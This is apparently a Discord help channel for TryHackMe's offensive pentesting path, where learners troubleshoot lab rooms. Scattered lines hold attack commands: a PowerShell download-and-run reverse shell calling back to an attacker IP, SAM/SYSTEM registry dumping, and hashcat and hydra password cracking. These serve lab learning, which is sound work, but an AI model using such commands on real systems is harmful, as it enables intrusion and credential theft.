#offensive-pentesting-path

i hope you can help me 🙂

can i share a screenshot somehow?

👍

what is exactly the difference between msfcosole and msfvenom ?

can´t I just do everything in msfconsole?

Msfvenom is a metasploit payload creatpr

Msfconsole is used to run metasploit modules

You can't create payloads from msfconsole

I don't have a kali to hand

Okay thanks. I´ve seen that you also can use msfvenom within msfconsole by just typing in the msfvenom command. I just have to figure out how to search for the different modules, payloads and stuff. It seems a bit confusing to me

That's just calling the "msfvenom" command - lots of commands in msfconsole work like that

could i get a little help with the file inclusion room challenge? feeling awful stupid

In which challenge do you need help?

so there's three flags, i got the first one, but stuck on the second

what i did so far was change the cookie value of THM to "admin"

this gave me the "this is a admin page, get the flag" message

|| try including file path as a cookie value ||

so i'm trying all sorts of chall2.php?file=/etc/flag2 things in the URL with this cookie enabled but to no avail

...not sure what you mean 😦

so i guess i'm not really understanding the whole concept of the entry point

cuz i read the forums and it says that cookie is the entry point, but i'm not sure how to use that

i'm so lost lol

it's alright, don't worry about it. i'll figure it out

thanks

got it 😄

||file path as the cookie value, use null byte to bypass the filter||

Phew. I just did brainstorm on my own. But let me tell ya, that was a long journey to get there!

I loaded a windows vm just so I could debug the binaries found. Anyone know of some ready made window vm's I can spin up that already have immunity debugger and friends for the future?

I used the tryhackme BOF basics machine
Which has already Immunity debugger in it

I solved the BOF module using this VM and my automated BOF tool

hi

Hey i have an odd one

I have an audio prcessor with strings on a nonstandard port

What is that about

@wild folio this channel is for the tryhackme offensive pentesting path.

I Just completed the Relevant Ctf Everything went fine Until I had to Do Privilege-Escalation I couldn't find any exploit for that windows version or any service running on it .
Had to watch the Walk through .

After watching the walkthrough when i searched for the exploit like ( the service name and exploit) with windows version . i couldn't find the exploit Either and had to copy the name from the walk through and search for it . Which i think in real life Won't be possible .

how did you guys Did this CTF ?

See that you have SeImpersonate privilege
Use one of many exploits to turn that into system

I did But i coudn't Found the Exploit By Googling simply Tried for like 30 minutes straight and Endup Just seeing the name of the exploit he used in the walkthrough and then google that name and use it .

https://github.com/gtworek/Priv2Admin

ooh Thankyou So much @keen iris 🙂

hi in alfred machine i couldn't find root.txt

there is no root.txt

i terminate machine and restart again

but nothing change

info say file is in the windows/system32/config folder

i'm in there right now but no root.txt in there and also i used "search -f root.txt" in meterpreter but couldn't find

so any idea ?

okey

i found the root flag

but why i have to migrate i didn't understand

i was NT AUTHORITY\SYSTEM before migration

after migration same but i couldn't see root.txt

Hello, I could really use some help here. I'm working on my OSCP certification and got caught up on one of their Pen200 modules.. so I decided to come to tryhackme to maybe I would better understand how to tackle the Pen200. Now I'm stuck on tryhack me, lol. So I'm working on the 'Buffer Overflows' room. This room has a section where you're supposed to use gdb (I only know this from using the help / walkthrough I found online) to discover the 'special' function's memory address and then pass that address to the binary 'func-pointer'. I've been able to use the 'disassemble special' command in the gdb to find the memory address to call the special function. I am converting the hex into ASCII, but this is where my problem is. There are no equivalent ASCII characters for x05 that I can seem to pass to the 'func-pointer' program. I can only pass the hex that has some associated ASCII characters. Perhaps someone can help me figure out how I'm doing this incorrectly, and how to do you handle passing hex characters when the ASCII equivalent is 'blank'?

g@

I'll try rooms-help

I don't know how the room works. But how do you pass stuff to the program? Like .. is it a commandline argument or communication via netcat or ...

in some places, you can also copy&paste non-printable characters(because they are still there, just dont have a visible letter to represent them). so create a file with these chars, copy the "text" and paste it.

Thank you, I just saw a video on someone's buffer overflow tutorial and he used print with python to put some hex into a file. So I may go that route. I appreciate you responding and thank you for the tip 🙂

Gave +1 Rep to @true hedge

Hi everyone, I've been trying to finish the room brainstorm for days now but I get this error when I try to load the application to the immunity debugger and I have no idea why. Does anyone have any ideas? I appreciate your help

Make sure you download it from FTP in binary mode

when I try to download it again the server tells me this and disconnects.

I'm playing Steel Mountain.
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
This is python2 code, does anyone know how to run it in python3?

modify it to syntax from py3

Hi

need help on brainstorm

my exploit working on my windows but not on box. couldn’t understand why.

Anyone had problems with Relevant? looks like it stops working after 1h and i am unable to terminate it. Happened 3 times already.

It shuts itself down at 1hr, it's a windows licensing problem

In task 5 of Exploiting AD, about keylogging a user to get the password of the keepass database, the process of the user don't spawn. How long does it take ?

The network has been up for 20min and we had some trouble with the connexion so it was reset

does this path help me towards ecppt?

hi

what does offensive pentesting mean?

Hi

hey so im running into an issue using the immunity debugger. when i run the exploit for finding badchars, and i use the mona commands to compare the memory it gives me "invalid address used" NEVERMIND IM SLOW

when its 100% the ESP register value

Hey, I am a bit stuck on task 8, flag 3 in this room: https://tryhackme.com/room/fileinc

I understand that I need to bypass the filtering of non alphabetic characters, and also make it not add .php at the end. Tried ....// instead of ../ and using %00, but none of these works, so I assume there is something else I must do.

I have been reading about $_REQUESTS, as the hint suggests, but haven't understood the connection to the task here. Been looking for it in the inspector in firefox, but haven't found it. Not sure if I am supposed to or not

I’m on the Alfred room and whenever I try to save the project i just get a “connection was reset’ error, I have tried this multiple times.. is it meant to be that way?

I need help 🙏🏻

how can i debug this

@zinc niche Do not ask the same question over multiple channels, it is spam

This happened to me as well

Anybody had any problem with this room? I’ve been stuck here and it’s the save is not working .. there is no way to build project without the save

I suspect this is the MTU issue - there are steps in the pins in #site-support to resolve it

Something along the lines of sudo ip link tun0 set mtu 1200 ?

or you can try the vpnscript

!vpnscript

as that checks for mtu issues and tries to set it to sane values too

yo

hello

I'm Facing Problem in Steel Mountain

In Task 4 exploit is not working properly showing this

I've done as per instruction even see walkthrough Do I have to change any code ?

Okay I solved The Problem

qustion about buffer overflow prep

do you use the some file to finish all ten OVERFLOW tasks

I'll try this again:

I am a bit stuck on task 8, flag 3 in this room: https://tryhackme.com/room/fileinc

I understand that I need to bypass the filtering of non alphabetic characters, and also make it not add .php at the end. Tried ....// instead of ../ and using %00, but none of these works, so I assume there is something else I must do.

I have been reading about $_REQUESTS, as the hint suggests, but haven't understood the connection to the task here. Been looking for it in the inspector in firefox, but haven't found it. Not sure if I am supposed to or not

have you tried using burp suite for said flag yet???

I did a little bit, but I guess I'll try that some more then

Thanks!

good luck

and remember that url encoding can get weird if you do not handle it properly making you unable to get the flag

did you figure it out? I can't get the program to crash whatsoever lol

I think my issue was that I was using 64-bit Windows, when I ran them in a 32-bit Windows vm they crashed at the correct number of bytes

Yes, just make sure that you change the prefix in the fuzzer and exploit to match the overflow task that you are working on

I'm trying to do Brainstorm in a Windows 7 VM and they were originally crashing at different byte sizes, but now it keeps crashing at 3600 bytes and when I use this number to generate the cyclic pattern and find the offset the exploit doesn't crash the server

ok ty

Gave +1 Rep to @crimson geode

i'm using windows 8 got the exact match as 2xxx, i'm finding it hard to overwrite the eip. my code stops working anytime i run the script. the chatserver respond with conection refused

don't know what i'm doing wrong

anyone done brainstorm room recently?

i've tried other codes online

same issue

i don't have access to upload a file

would have sent screenshot

hello there

Same issue as @eternal hare. Could you solve it?
Anyone some hints when or how the Trevor.local process spawns?

I found a message pined in the "exploiting-ad" channel of the group "Networks". But the process is impacting all current users as it restart the machine. I tried it a few time but and didn't work either.

Hi guys
Alfred room
i have a question about this command:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

for example if i load first the script

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/Invoke-PowerShellTcp.ps1','Invoke-PowerShellTcp.ps1')"

how can i run it? (2nd part of command)

Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

I know you have to enter the full command to answer the room's questions and get rshell
but just to understand and learn if you can do it separately.

Hey guys, what am I doing wrong? This is from the buffer overflow-brainstorm room. It's going in passive mode every time...

Connected to vpn
Machine is up and running
Yesterday it was the same

Connect to the ftp again, then type passive to toggle off passive mode

Thanks!!

how'd you fix it?

is it me or is anyone else's jenkins server moving slow.

like i have to wait 2 mins before it allows me to put in a new command.

You have to change little bit code in exploit.py and run it twice

You will see what to change if you check the code

I was changing the code but was a little lost

Run it with python2

ok

Hello, I've reached the room of Buffer Overflow Prep, which is a bunch of Tasks with barely any explanation. I'm not good in Buffer Overflow attacks and i need a place to start. Could you please provide me a guide or a room that starts with the basics that should be done before this room

https://tryhackme.com/room/bof1 is probably the closest we get... otherwise just look at the writeups to learn from those

Not very helpful either, it assumes you already know more than a beginner would

Hufff

then it is read writeups and try and learn from those

Trying but not finding good resources to be honest

well shadow is in the same boat.... just not at that room in this path yet

Thank you, I'll check it

Gave +1 Rep to @wary glen

Any resource helps

Heyy Jo people. If you connect to some servers like Http-Server or IMAP-Server with telnet or netcat, there is curtain Strings that you want to send to communicate with those servers. For Example, when you communicate with HTTP-Server with Telnet, you would send 'GET / HTTP/1.1' and 'HOST: BLA'. My Question is: Is there any Website or Document where this Strings are listed in Reader-friendly-way for a lot of Servers(for FTP, HTTP,IMAP, and all the other stuffs, etc..)?

They're specified in the protocol documentation for said protocol.
Usually you just use nmap or a real client because it's easier than doing it manually

Odd question but anyone know of a good writeup for the last part of Steel Mountain. After 2 hours I feel like something's off.

hi. i'm trying to solve the steel mountain room. i'm trying do move the payload generated by msfvenom to the right directory in the target machine, but every time i try to move the file, it says "access denied"

any advice?

i'm trying to solve the same room. were you able to replace the service?

No I haven't went back and tried yet. I was able to do everything except the last page where you have to manually do it.

oh ok. I'm gonna try that page in a couple of minutes. I got to replace service just now

Sorry didn't get a lot of sleep last night but I can't recall where on that page I stopped. I believe it was copying the code from the links and utilizing it.

no problem 🙂

Hi, I'm running the blue module and I've used metasploit to open a reverse shell to the target, but now my metasploit is opening a ton of sessions. Any thoughts as to what is going on? I'm on a kali virtual box connected over openvpn to thm.

What task page are you on? I think I remember there being a walkthrough that pointed out one catch to it

the first page, recon

Gotcha. Did you get that when attempting the nmap scan?

i got that after chosing the exploit, adding the reverse shell payload, and sending the run command. i got a shell, but then it continues to open sessions

Did you pick use 0 or use 3?

i did use 0

did you try finishing the terminal and run the exploit again?

it could be a random bug

^ you're about on track I believe without looking.

so any idea what metaploit is doing when it's opening all those sessions?

it eventually stopped after 279 sessions...

Did you set rhost and lhost? They mention in the video you might need to reboot both machines if it goes crazy.

It's repeatedly trying to open sessions and failing and creating new ones until it runs out of space to open new ones.

Start at the 6 minute mark in the video and go until 6 minute 45 seconds.

yeah, set the rhost according to the generated vm and set the lhost to my tun0 ip

i'm at a stable command prompt now so it seems to have settled down

If you ever need it to stop it when it goes off the rails Ctrl c will stop it.

this is my first time swapping to kali on a virtualbox, previously only used the attackbox so it was weird

thanks for the assitance @rigid arch

Gave +1 Rep to @rigid arch

Aw thanks! Remember like we were saying might need to reboot the machine and I believe it takes a few minutes after boot until you can reach the target machine.

Sometimes you have to ping the machines ip to make sure.

Or wake it up it seems.

if i'm not mistaken, the vulnerability used in this room uses a buffer overflow thing, so it may happen that the exploit run several times to take place

Yeah it's using the smb vulnerability if it's the Blue (Eternal Blue module).

haha, now i have 278 sessions in metasploit. I think I'll just restart the vm and start over.

precisely

hahahah xD

Did you figure out where you should put the CVE exploit on task 4 of steel mountain?

Wasn't sure if it was desktop, /use/bin/ or same as ncat.exe

Oh sweet look up steel mountain on YouTube by hackersploit. Found our answer!

They did a really awesome job of explaining the small details.

sorry, man. i did go to sleep before seeing the messages 😦

didn't know the channel. gonna see the video if I get stuck xD

Have you tried downloading it from the 'temp' directory?

Hi! I'm trying to complete the Blue room on this path, but can't seem to exploit Eternal Blue correctly (exploit runs, but not able to get a reverse shell). Not completely sure what I could be doing wrong, I'll post the error I receive

It does receive some valid responses back when running the exploit, but it can't establish the shell

can you show your options with show options

Sure

your lhost is very very wrong

Just realized that

Thanks very much

Gave +1 Rep to @vernal mason

no problem and good luck and have fun with the exploitation

Just to ask, but on the browser VMs you cannot use port 80 for any of the exercises as it's tied up with the browser VM control; correct?

Ergo you need it locally installed to a machine for the instructions to work when it calls for using port 80 for say http.server in python?

You can SSH in and then kill the service listening on port 80

Thank you! Now I need to figure out how to give rep. Haha

i was able to solve it. but thanks 🙂

Gave +1 Rep to @ember loom

Having some trouble with this part. Need to manipulate the path for /usr/bin/menu, but not really sure what to do

/usr/bin/menu runs as root, but I'm confused how to use it for privilege escalation

All good actually, was just overthinking it

Hi anyone here

Got stuck at JR pentesting path

File Inclusion room

Just ask your question, you'll get help faster.

In Lab #2, what is the directory specified in the include function?

Warning: include(includes/test) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab2.php on line 26

Warning: include() [function.include]: Failed opening 'includes/test' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab2.php on line 26

Can;t post a screen shot

answer format: 8 letter word

On brainstorm room, I scanned TCP and UDP ports with nmap and found a number of ports. Though, it is not the answer of the first question. Anything I'm missing here? I could get the answer by brute forcing the answer but meh...

maybe it is just bugged or wrong ¯_(ツ)_/¯

how did you scan it?
A normal scan only scans the most common 1000 ports, maybe the room requires you to scan more than those.

I used -p- for port scan for tcp and udp

I want to do this path in one week. Is one hour per room realistic?

error from the room

How?

considering a huge amount of businesses and companies use active directory... yes it is important

AD is super fun.

shadows main complaint is that windows machines on tryhackme are not the fastest compared to linux ones

Of course, windows requires more resources than Linux

now the question is why does it require more resources than linux

cause of all the bloat that is in windows

I always install the N versions.

It's reduced bloatware, still some there though.

I like the Edu version, it's somewhere between pro and enterprise, got student licenses through azure for students

I haven't tried that one before, next time I need one I'll give it a bash.

I'm in the HackPark machine, Task 3

The place where I'm supposed to upload the .acpx file and obtain a reverse shell doesnt seem to work

The file has my tun0 attacker-ip, the listener port (1234)

and nc -lvnp 1234 is just stuck forever after triggering the payload.. what am I doing wrong?

what command did you use to generate the aspx file

It's a public download at exploit-db

*acsx

I got it... typo in the file extension 😦 Wasted 1 day after this

I am having some issues on Brainstorm. Got everything working on my local system but it crashes the THM machine.. Any help here? I have tried different payloads. Still the same..

I can get root access on my own machine, But not the THM machine... 😦

after it crashes once you will need to reboot the target machine

Yeah i figured that much. but nothing helps. My exploit dosent work. I event tried some different. I time e Netcat in i get the chatserver. But the exploit just chrases and no shell.

i even borrowed a shell that "works"

figured it out. my vpn was to blame. i ran the thm.troublesoot script. and the MTU value was off..

I got a problem with metasploit and SSL for the GAME ZONE box

Task 4, I've got my exploit and payload set upp. Auth fail when I run it. Says

"[-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: wrong version number"

No results on Google. Looks like a SSL version mismatch... But do I downgrade it?? I'm not sure how to read into this. Can anyone help?

It worked finally. I just kept hitting run and the 10th time it connected.

I am doing the HackPart CTF, but still have no idea how to find the name of the clown which displayed on the homepage(Task 1)

Did I miss something?

Reverse image lookup

thanks

I’m doing the brainstorm room, i tried connecting to the ftp with anonymous login, it allow anon login but when I try to list files it enters passive mode, i also tried using the Nmap script it says Anonymous FTP login allowed (FTP code 230) ….can’t get directory listing: Timeout .. am I missing something ?

Lol 😂 you are not alone, powershell sucks even more

Hi, guys. I have a problem with Overpass 2 room. I tried to connect to 2222 port, but terminal output me

Unable to negotiate with <ip> port 2222: no matching host key type found. Their offer: ssh-rsa
I google it, and found answer with -oHostKeyAlgorithms=+ssh-rsa. I tried too, ssh tell me authorize, then I write a CORRECT password, but nothing happened! Password is "||november16||".

You have to exit passive mode. When FTP "starts" type passive.

And before you mget all the files you need to enter binary mode, to ensure the files dont get corrupted

Thanks that worker

Gave +1 Rep to @vernal sluice

Worked*

Hey y'all, I reset the Daily Bugle room and no matter what I try I cannot crack the hash to the jonah account. Has anyone successfully done this room recently?

FWIW I have had John and Hashcat attempt this and both have ran for hours

maybe it is not in your password lists... but if you think about it the password is something kinda obvious

also if you check the hash type you will notice it is one that is gpu resistant meaning yeah it takes a long time to crack

if you want a quicker crack here is a command you could try
sed -n '45000,50000p' <path-to-rockyou> | hashcat -m3200 -a0 --force '<hash>'

Thanks I’ll try that and see how it goes

working my OSCP and really having a tough time with one of their coding exercises. I know its simple but I'm not very good at coding. I need to create a Bash script that will ping a range of IPs you input as a variable and only reply back with hosts which are live. The syntax would be something like 'ping.sh 192.168.2 1 10 . This would ping IPs 1-10 on the 192.168.2.x subnet. Anyone able to assist?

I played daily bugle a couple weeks ago. You have a screenshot.

I ended up getting it to complete, I my resource allocations for my VM got mucked up.

Room: Credentials Harvesting
Task 4: Local Windows Credentials

Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[-] 'NoneType' object is not subscriptable
[*] Cleaning up... ```

why didnt it work?

Hm Strange, Tried a different method and it worked

Used this below command to dump the sam and system and used those files with impacket
reg save HKLM\SAM sam.bak; reg save HKLM\SYSTEM system.bak

hello

for the bufferoverflowprep - i did a few and then left... how do i pick up where i left off? when i try and load the .exe it starts me back at one... trying OVERFLOW 5 test - doesnt start the program at 5 just at 1 😦

You just change prefix in the python code.

you can even start at 10

blinks lol im dumb... ty

i thought the nc command is what did it somehow

😄

The Nc is just to check that the service is up and not in a chrashed state 🙂

Just do the tasks religously. It helps later 🙂

In Gatekeeper room, may i have to install my own Windows machine with immunity debugger?

yeah that is basicly the idea... to have your own windows vm with immunity debugger and mona

though you could technically cheat with using the buffer overflow prep target machine and just move the executable onto said target machine

Thank you!!!You made everything clear!!!!

Gave +1 Rep to @vernal mason

no problem

how to make a windows vm???

well not sure

download the win 10 iso and install it on virtualbox or vmware?

darn microsoft dicontinued the edge debugging virtualbox vm:s

I’m on the brainstorm room and I can’t seem to find a fuzzer to crash the chat server program, any help? Or maybe I’m not doing it right

you are more or less intended to do that yourself using your own script made in python

My bad, I was connecting to the wrong one 🤦‍♂️

oh good you figured out the issue yourself

Probably a dumb question
For the bufferflow tasks, do I have to complete all of them on the challenge VM?
It's incredibly slow and annoying

You can setup you own wm and download all the task files and do it there. and thats a good idea because you need the setup for later tasks.

IF your system has the resources.

Won't the addresses change?
Like, I should probably keep it a Windows 7, 32-bit, right?

(I always download tasks for later :P)

Not in the program. Just the IP.

I am solving the Daily Bugle room (Task2), but when I am executing the joomblah.py script it shows the following error message, please tell me how to fix it

[-] Fetching CSRF token
[-] Testing SQLi
Traceback (most recent call last):
File "/home/kali/Desktop/daily_bugle/joomblah.py", line 186, in <module>
sys.exit(main("http://192.168.10.100:8080/joomla"))
File "/home/kali/Desktop/daily_bugle/joomblah.py", line 183, in main
pwn_joomla_again(options)
File "/home/kali/Desktop/daily_bugle/joomblah.py", line 147, in pwn_joomla_again
tables = extract_joomla_tables(options, sess, token)
File "/home/kali/Desktop/daily_bugle/joomblah.py", line 74, in extract_joomla_tables
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
File "/home/kali/Desktop/daily_bugle/joomblah.py", line 46, in joomla_370_sqli_extract
result += value
TypeError: can only concatenate str (not "bytes") to str

@drifting ibex What's the command your using?

python joomblah.py http://<attack machine IP>/

Thanks for trying to help me, just found a solution

Gave +1 Rep to @steady scroll

The Buffer Overflow Exploitation module is really fun, 10/10 would recommend, nocap frfr

hello, can someone point me to the right direction using a certain metasploit module?
im on the enumerating STMP section and I need to use stmp_enum in metasploit to discover the system mail name
but actually metasploit with the given commands does not return the expected results
it scans and says aux. modules execution completed, but it does not say anything.

I heard this specific module is not great, is there any other way to discover it?

use pyenv to use python version 2.7.18 to run the exploit

Hello, I am trying to run hydra on http post login form but getting multiple passwords in response. Can somebody please guide me what am I doing wrong here? Here's my command sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.56.172 http-post-form "/Account/login.aspx:UserName=admin&Password=^PASS^:Login failed"

Try using -f ( so hydra stops when it finds a valid Cred )
and why run it with Sudo Privileges ?

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.56.172 http-post-form "/Account/login.aspx:username=admin&password=^PASS^:Login failed" -f -vv 

Try this

Gave +1 Rep to @turbid notch

Thanks for the help. I tried adding cookies to the command and it worked sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.138.187 http-post-form "/Account/login.aspx:__VIEWSTATE=2mg4pY6EsI2J5q1OG1jLQ%2BpQ0lnzolWWzSPSyNzOXqPhqVQomQ243dzseoC9w4TZ%2FYaE%2BpMfcqSRMtmOdwh5ZxWKB%2B6JAire6gWxDleqv7GIt4RGA0EA8Hd%2FofoRgte%2F%2FrNaKb0pI3V%2BhbcKLRrf7%2BfuS%2BjJ4vh41wFWJsM2%2FYJXsrkO&__EVENTVALIDATION=YcMApz62%2B4jbOtkD5XtqW171khBIdohX9%2Fu2b6tciZGVoUZeuanljoHQwsB0Q%2FbLtsnvJ%2FEClKLr%2BbKe6qgKpGU1LqGqvufdIMGEw7HhbHDO6JbRE%2Fg5AE9ArDH1JJ3xp3gr5l4dtGuwUoEnYQjh3Q6YkhPjoWqqtFrEVtt%2BLQYU8i5D&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V

Well glad you found a way 🙂

Hey guys,
Need some help in the Alfred Room... I am trying to connect to the webserver using rev shell and cmd keeps failing due to an & 'ampersand' error. Can someone explain me my error!

It's not failing on you .

You are not Uploading the shell right

You might doing it Wrong @sour silo
Go to Jenkins > Project Add the command in build section . Save it come back and then keep your listener ready and just execute it
Don't forget to start a webserver for that Powershell file

and then getting a connection back to your Listener ```

Anyone tried "Internal" machine today? I am having problems with it, can´t log with the credentials I found.

If you found Root Creds , You won't be able to login with same shell using SU command . Loggin with SSH .

I do understand this part. I have the webserver running on 8000 and I do get a HTTP 200 everytime I run the build before the “;” part of the command. I also have an NC running on 9000 as well. The thing is what is the error saying, I dont get that. One more thing after like 4 tries I referred a writeup but the error was still there.

Well I have no idea either
All i can Notice is 2 errors it's giving you
verify the Path and check spellings
Invoke-expression : ampersand not allowed
you might wanna Google em or use chatgpt 🙂

I won't mind if you can show me ( how you're doing it ) in VC .

The path and spell check is good. The only I dont get is ampersand not allowed

Well wait a sec Send me a DM I'll screenshare the CTF and you can see What's happening .

Well right now m leaving for uni so wont be able to, but will dm or ping when able.

sure

I'm doing Attacktive Directory room (Task 5), but when I'm executing GetNPUsers.py, it shows the following error message, is there something I'm doing wrong?

Try this
./GetNPUsers.py -dc-ip ip spookysec.local/svc-admin -no-pass

The domain is named spookysec.local not spooky.local

@fleet wedgeLooks like I really need a nap right now🤣

@fleet wedge Thanks for your help

Gave +1 Rep to @turbid notch

Hi team, I got a question about the Active Directory "sub path". Why is there a time limit in certain rooms? For some rooms I see a "You have access to this room for a limited time" and on the top left corner something like "3 days of access left". What happens after that time expires?

Oh OK, I see. Cool! I found it a little odd since it was the first time I joined some of those rooms. Thanks for clarifying!

Lolz . No worries

I was supposed to log through the browser, at least it is how the writeup shows

**Spoiler Alert **

we use ssh-Tunnling to make it avaliable to us hack it and then get root creds and that's about it 
that's when i said when you'll find root creds you won't be able to login Via using SU command 
You'll have to login through ssh and get the rootflag ```

it is some url like ip/blog/wp-login.php

yep.. but before uploading the reverse shell we need to find "admin" password and log into wordpress through browser so we can upload the rev shell

You have to hack wordpress get the Panel and upload Php-revershell .

I am not being able to log into wordpress through browser

what creds did you found ?

admin and a password

Yeah what was the username and the pass ?

login:admin password:my2boys

Sound about right

the login page was not even being loaded properly

there was no wordpress logo

ooh did you added Internal.thm in your host file ?

I think there is some bug

no

Well you have to

ok..

that's why you can't see the blog or the wordpress login panel right

I never had to add any name into my /etc/hosts

go to /etc/hosts add ip and then internal.thm

ok. thank you!

I will try it when I get home

I never had to add any name to /etc/hosts on tryhackme machines

I thought there was some default configuration

Well if you watch his video he Did the same .
i was stuck there for a while as well Cuz mostly if that's that case it's mentioned but i think the creator forgot to

I am using the AttackBox and Kali from web browser

I think you still have to add it to your host file
not sure but why not try it
i Always use VPN

I like attackbox, I can use it from anywhere

Lolz i also forgot to remove it from my host file

lol

True but you can also use your terminal using SSH from anywhere 🙂 It dosen't suck and it's way faster .

Now that you are playing Internal
what are you plans regarding Buffer-overflows

Well, I try to do one machine a day.. of course it doesnt always work because I usually have 3h-5h to try it each day

if I own internal today I might start buffer overflow Rooms

also today

I've never did any bufferoverflow vulnerability

not that I remember

Well it's not a Walkthrough room As they defined it It test you
and i haven't found much guide regarding it in THM either
Some People suggested me to learn it from somewhere else
But personally i just moved to active-directory

AS thm says Please note that this room does not teach buffer overflows from scratch. It is intended to help OSCP students and also bring to their attention some features of mona which will save time in the OSCP exam.

nice

this is what I was looking for anyway... some rooms that prepares for OSCP, I may try it in the future

yeah plan the same
I'll just complete the other stuff and move to Networks & Red-teaming for now .

I will try Buffer Overflow, If it takes too much time I might stop trying the machines a little and study a lil more about BuffOverflow

Hello family and friends?

ello

Hello friends , anyone getting error in room Lateral Movement and Pivoting

the nslookup fails. I already have done 'Breaching AD' and 'Enumerating Active Directory'

How are you?

Hi,
I am trying to solve the Gatekeeper room and while testing for BoF my script is failing to fuzz.
It keeps on crashing in the first iteration whereas when I used netcat the data flows as required.

First Connection is when connected from netcat and second is when connected via script.

Have you tried to run it from different version of Python. E.g:

Python3 fuzz.py (try python2 and python)

Same here for “Exploiting AD” room both from attackbox and vpn

Yes, getting the same issue.

oh right that is the one shadow cracked with ruby instead of python

before shadow figured out how pyenv and virtualenv and venv worked

Thanks man a lot!

Gave +1 Rep to @vernal mason

no problem

I finished Jr Pentester path and started Offensive Pentesting. First room was Alfred. Am I supposed to solve this on my own? Because I had to look up a walkthrough video and I feel like a loser lol.

no, this is a good idea i should do that

Hi I have question about bufferover flow room

I did the right steps to get the offset of overflow2 but it’s wrong I tried different msf pattern bytes I still get the same offset

So why is it wrong what mistakes am i doing?

That is not possible. maybe you typed something wrong in the exploit.

I am in buffer overflow room and I do not really understand what is going on. Can you recommend some learning resources on this for a beginner?

https://www.youtube.com/watch?v=ncBblM920jw&t=208s

That is a really good start. Explains a lot of things to get you started.

Also read up on Buffer Overflow basics 🙂

i think i should get a book on C haha

Dont need to know C for buffer overflow 😛 When you understand the simple basic of BOF it just clicks.

But the OSCP BOF room is not good for understanding BOF.

it is a practice room. So if you dont understand it right now just read a little and do vulnserver. and watch some videos explaining it you will get there 🙂 i dont know almost any C and i managed the room and Brainpan,Gatekeeper.

hey guys

im having issues in alfred room

after putting the payload

powershell iex (New-Object Net.WebClient).DownloadString('http://10.2.27.62:1234/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.2.27.62 -Port 9001

thats my ip

i click on apply and immediately i click on save the site crashes

is there an admin here or a mod?

Why do you need a mod/Admin?

i wanna know why it keep crashing

instead of uploading the script

Mods/admin != Site staff.

(With the exception of Fontaene, Jabba, Ben)

I wonder if it's because you have

Invoke-PowershellTcp.ps1%27

nope

powershell iex (New-Object Net.WebClient).DownloadString('http://10.2.27.62:1234/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.2.27.62 -Port 9001

i think discord is doing that

its the same payload from the alfred lab

i tried to download it from another tab and it works

Hello,
I'm in the basicpentesting room, and I try to get a username and password from the port 80 using nmap --script smb-brute -p 80 <IP> but it just outputs that port 80 is open and the mac address, what am I doing wrong?

I've also tried doing http-brute, same thing
It says in the Hint that I should use SMB, which I did 🤔

well smb is definitely not running on port 80

Should I access a pathway?

I did it on the open 445 port and it says no accounts found 😩

have you tried the script called smb-enum-users

nmap --script smb-enum-users -p 445 <IP> gives nothing too

Gives

PORT STATE SERVICE 445/tcp open microsoft-ds MAC-ADDRESS: <mac address>

---
-- @usage
-- nmap --script smb-enum-users.nse -p445 <host>
-- sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>

Didnt work

Same same for some reason

nmap --script smb-enum-users.nse -p445 <host>

eh meep it... just assume there is an anonamyous user on smb on there and use smb client to connect to the share

also known as doing smbclient -L //iphere/

Says "Enter WORKGROUP/root's password:"

Weird thing is the task wants me to enter a username...

just hit enter on that prompt

Hi I am in buffer overflow prep room. I am looking for bad characters using mona as described in the room !mona compare -f C:\mona\oscp\bytearray.bin -a <address> The room says Repeat the badchar comparison until the results status returns "Unmodified". This indicates that no more badchars exist.
However I cannot get to this point. I remove the bad characters from the payload, generate bytearray using !mona bytearray -b "\x00" adding the bad characters I found but the compare function always returns the bad characters I already removed

You have to add them to the command !mona bytearray -b "\x00 INN HERE"

and gererat a new byte array to send without those characters

I did that but i found out it was caused by not updating the address on the second run

Ahhh. Well you learend something new then 🙂

Whenever I do nmap -P80 (or any other port) it says "Illegal argument to -P, use -Pn, -PE, (etc, etc)

yeah use a small p to specify port

large p has another meaning

Ah gotchu

Btw I'm still on the basic pentesting room, and Port 80 is open with a apache server. I tried the nmap --script ajp-brute -p8009 <IP> because the "AJP Jserv" is on that port, but it says it doesnt need a login

Answer needs a username and password tho

I found a hidden directory with the name "development" earlier, which I'm intending to get into, but the question is how I brute force the servers username and pswd

points at hydra

Never heard of it. Will have to read up on it on the practice part of THM

it is a good tool to know and definitely recommend checking it out and reading up on it

Weird thing is that this room was under "Based on your experience" but doesn't seem as if I'm there quite yet

there are quite a few rooms on tryhackme where hydra is the answer to get in

yeah fair

But hey, trying out stuff you dont understand makes you realize you still are green as hell haha

hey guys

im doing the daily bugle

after i put my reverse shell

and try to save it loses connection

anyone know why?

It happens when you save the php file not when you are accessing it again?

worth to check that your machine/room not exceeded the expiry counter

Vm

anybody able to help in -lvnp online?

nc -lvnp

listener

anyone can help me with brainstorm room? i downloaded chatserver.exe but i cannot open it on immunity debugger its saying i need 64bit

nc -lvnp port number
example: nc -lvnp 4444

If you have the file locally on your machine you can send it to the windows mchine on buffer overflow prep room 🙂 I personally made my own x64 bit vm. felt it was a bit smoother. But i have the machine rescources.

yes i did download the file locally but it dosent open

